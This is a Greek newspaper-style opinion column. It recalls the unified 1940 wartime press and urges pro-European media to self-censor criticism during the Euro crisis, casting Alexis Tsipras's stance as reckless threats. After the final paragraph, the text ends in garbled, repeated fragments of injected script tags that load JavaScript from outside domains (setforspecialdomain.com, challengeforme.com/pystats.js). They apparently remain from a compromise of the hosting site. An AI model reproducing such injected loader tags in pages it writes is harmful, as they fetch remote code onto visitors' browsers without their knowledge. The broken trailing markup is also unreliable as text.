Πόλεμο έχουμε και σήμερα!! Του Θαλή Κουτούπη

0046

Το 1964 επιμελήθηκα τη συλλογή του υλικού και την έκδοση ενός τόμου, με τίτλο “Η Εποποιία του 1940”, από πρωτοσέλιδα κι εσωτερικές σελίδες των εφημερίδων της εποχής, με έρευνα που έκανα επί μήνες στη βιβλιοθήκη της Βουλής!

Δεν είδα πουθενά, κάποιο σχόλιο, άρθρο, γελοιογραφία, που να υπονομεύει το ηθικό και το σθένος, με τα οποία αντιμετώπιζε ο λαός μας τον πόλεμο.

Πόλεμο έχουμε και σήμερα! Κι όμως βλέπω συχνά και σχόλια και άρθρα και γελοιογραφίες σε έντυπα, που στηρίζουν την προσπάθεια παραμονής της πατρίδας μας στο Ευρώ και στην Ευρώπη (κόντρα στις παλαβές, αλαζονικές, πεντοζαλισμένες απειλές του Αλέξη Τσίπρα), να υπονομεύουν και το ηθικό και τις αντοχές του εκλογικού σώματος!

Η ελευθερία έκφρασης γνώμης είναι πάντα αδιαπραγμάτευτη! Θα περίμενα όμως για την περίπτωση μια συνετή αυτολογοκρισία, όταν μάλιστα σε σχετική έρευνα, οι δημοσιογράφοι έχουν δηλώσει σε ποσοστό 73% ότι αυτολογοκρίνονται σε ομαλές εποχές, ανάλογα με τις ντιρεκτίβες των εκδοτών/καναλαρχών ή προσωπικών πολιτικών επιλογών.

Οι καιροί απαιτούν συνολική εθνική ομοψυχία, πόσο μάλλον ομοψυχία τουλάχιστον των ευρωπαϊστών δημοκρατών, που ανήκουν στη δεξιά, την κεντροδεξιά και τη φιλελεύθερη παράταξη!___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’> challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >